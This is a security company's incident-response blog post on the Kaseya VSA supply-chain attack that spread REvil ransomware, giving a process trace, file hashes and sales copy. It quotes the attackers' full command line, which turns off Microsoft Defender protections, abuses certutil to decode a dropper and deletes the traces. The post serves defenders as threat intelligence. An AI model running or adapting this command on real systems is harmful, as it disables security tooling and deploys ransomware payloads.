MegaplanIT

MegaplanIT

Security & Compliance

Active Threat: Kaseya Software Supply Chain Attack

By: Andrew Haslett LinkedIn_logo_initials

Security Engineer – Incident Response Specialist 

Active Threat – Happening Now

We are monitoring a Supply Chain attack outbreak utilizing REvil ransomware. At this time it appears to stem from a malicious Kaseya update. A malicious DLL containing the REvil Ransomware (C:\Windows\mpsvc.dll) is side-loaded into a legitimate older copy of Microsoft Defender (C:\Windows\MsMpEng.exe) to run the encryption from a legitimate-looking process.
 
Attack chain contains code that attempts to disable Microsoft Defender Real-Time Monitoring, Script Scanning, Controlled Folder Access, etc. via PowerShell.
 
Process Trace:
1. C:\windows\msmpeng.exe
2. C:\kworking\agent.exe
3. C:\Windows\SysWOW64\cmd.exe 
4. ( Listed Below )
5. AgentMon.exe
6. C:\Windows\System32\services.exe
 

“c:\windows\system32\cmd.exe”
/c ping 127 0 0.1 -n 4307 > nul & c:\windows\system32\windowspowershell\v1 0 \powershell.exe set-mppreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess disabled -EnableNetworkProtection auditmode -Force $true -MAPSReporting disabled -SubmitSamplesConsent neversend & copy-item /Y c:\windows\system32\certutil.exe c:\windows\cert.exe & Write-Output % random% >> c:\windows\cert.exe & c:\windows\cert.exe () -decode c:\kworking\agent.crt c:\kworking\agent.exe & remove-item /q $true /f c:\kworking\agent.crt c:\windows\cert.exe & c:\kworking\agent.exe
 
 
 

The following command is run, which:
• Disables Real-Time Monitoring
• Disables IPS
• Disables Cloud Lookup
• Disables script scanning
• Disabled Controlled Folder Access (ransomware prevention feature)
• Disables Network Protection
• Stops cloud sample submission
 
Agent.crt is dropped by the Kaseya VSA. It is then decoded with certutil to carve out agent.exe. Inside agent.exe it has 2 files embedded, MsMpEng.exe and mpsvc.dll. The legitimate Windows Defender executable was used to side-load the REvil Ransomware
 

Hashes

agent.exe (dropper): d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

 
mpsvc.dll: 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
 
cert.exe: 605045dc7b338492bdc2de5a1c3e01d64d3cc43aed429edbe88ee6f2feba284c  
 
We will update as more information become available. To Read More About This Attack: https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/ 

Looking for a knowledgeable partner for your cybersecurity and compliance efforts? We're Here To Help!

We look forward to talking to you about your upcoming Security Test, Compliance Assessment, and Managed Security Services priorities. Our expert security consultants and QSAs are fully certified and have decades of experience helping businesses like yours stay safe from cyber threats. Set up a time to chat with us about your biggest payment security and compliance challenges so we can partner with you to solve them!

Share this post

Industry Leading Certified Experts

Subscribe

Subscribe To Our Newsletter & Stay Up-To-Date

Explore Our Blogs

Whitepaper | 10 min Read

Developing An Effective Compliance Program

This whitepaper provides organizations with a path forward. We will walk through aspects of an effective compliance program and how it can be valuable to your business. We will also outline critical steps towards developing and implementing a useful and effective Compliance Program.

New Service Offering | Contact Us

Ransomware Preparedness Assessment

As new vulnerabilities emerge in response to ongoing geopolitical threats, are you confident that your organization could defend against a ransomware attack? If not or if you are unsure, MegaplanIT is offering a Ransomware Readiness Assessment free of charge for up to 50 Systems. 

ResourceGuide | 8 min Read

Cybersecurity Roadmap For 2022

Companies need to be aware of their current state, where they need improvement, and how to be proactive moving forward. Dialing in on the key elements your organization will need to succeed is a great starting point to having a full-fledged plan in place, and it all comes down to the fundamentals. 

We're Here To Help

We look forward to talking to you about your upcoming Security Testing, Compliance Assessments, and Managed Security Services priorities. We are ready to help and discuss more information with you on our comprehensive list of services. 

Make Our Team, Your Team!

Our innovative IT security and compliance solutions are designed to deliver customized, cost-effective service on time—because your priorities are our priorities. With a highly qualified team of PCI-DSS QSAs, Penetration Testers, and Information Security Consultants here at MegaplanIT, we will assess your unique company and business environment and design a path to security that will fit all of your needs.

Ransomware Assessment Preparedness

Cybersecurity Roadmap For 2022

Developing And Maintaining An Effective Compliance Program

As new vulnerabilities emerge in response to ongoing geopolitical threats, are you confident that your organization could defend against a ransomware attack? 

A Cybersecurity Roadmap details priorities and objectives to drive progress towards security goals. The roadmap follows a data-driven path based on answers to critical questions

This whitepaper provides organizations with a path forward. We will walk through aspects of an effective compliance program and how it can be valuable to your business